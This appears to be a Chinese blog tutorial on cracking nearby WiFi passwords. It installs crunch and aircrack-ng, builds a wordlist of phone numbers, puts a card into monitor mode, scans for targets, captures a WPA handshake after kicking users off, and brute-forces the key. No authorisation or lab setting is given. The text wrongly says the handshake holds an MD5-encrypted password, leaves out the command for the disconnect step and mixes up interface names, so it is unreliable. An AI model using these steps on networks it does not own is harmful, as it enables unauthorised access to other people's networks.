WIFI破解

1.环境

1.1,Linux系统(我用的Ubuntu18.04)

1.2,crunch

用于生成密码字典 官网:https://sourceforge.net/projects/crunch-wordlist/

sudo apt install crunch

进入crunch的安装目录下面可以看到里面有一个charset.lst文件,里面定义了一些名词 用于简写用于制作字典的字符
WIFI破解_第1张图片
示例:

mixalpha-numeric-all 包含大小写英文,数字,标点符号,特殊字符
139开头的手机号密码字典:crunch 11 11  +0123456789 -t 139%%%%%%%% -o num13.dic

1.3,aircrack-ng

WiFi搜索和截取握手包 官网:http://www.aircrack-ng.org/

sudo apt install aircrack-ng

1.4,创建目录用于存放 字典文件/三次握手包

2.获取包含WiFi密码的握手包

2.1.列出了支持监控的无线网卡

sudo airmon-ng   

WIFI破解_第2张图片
如果没有任何输出,则表示没有支持监控的无线网卡.网购外置网卡即可

2.2.开启监控模式

sudo airmon-ng start wlp6s0

执行成功之后网卡接口变为wlan0mon;可以使用ifconfig命令查看

2.3.查看WIFI网络

sudo airodump-ng wlp6s0mon

执行上述命令后,会列出周围的wifi和它们的详细信息,包括信号强度、加密类型、频道等。记下来要破解wifi的频道号和BSSID。
按下ctrl+c 结束

BSSID 隧道号
BSSID CH

2.4.获取握手包

握手包格式: wifi-01.cap

当有新用户或断开用户自动连接wifi时,会发送握手包
握手包里有MD5加密的WiFi密码,MD5加密不能反向推出密码,所以只能用密码字典穷举破解WiFi,进而后面使用的字典强度将关乎到是否破解成功

sudo airodump-ng -c  CH隧道号  --bssid  BSSID  -w ~/  wlp6s0mon

-w :获得的握手包保存位置  

2.5.新打开一个终端,运行命令将连接此WiFi的用户断开,用于重新连接时获得握手包


2.6.当终端右上角显示 WPA handshake: 44:97:5A:38:6E:E0 时就是获得了握手包,Ctrl+C推出即可

WIFI破解_第3张图片

2.7.结束无线网卡的监控模式

如果不运行这一步,会导致Ubuntu WiFi不可用,显示没有WiFi适配器

airmon-ng stop wlan0mon

2.8.字典破解握手包

aircrack-ng -w 字典  握手包 

你可能感兴趣的:(Linux,工具软件,WIFI破解)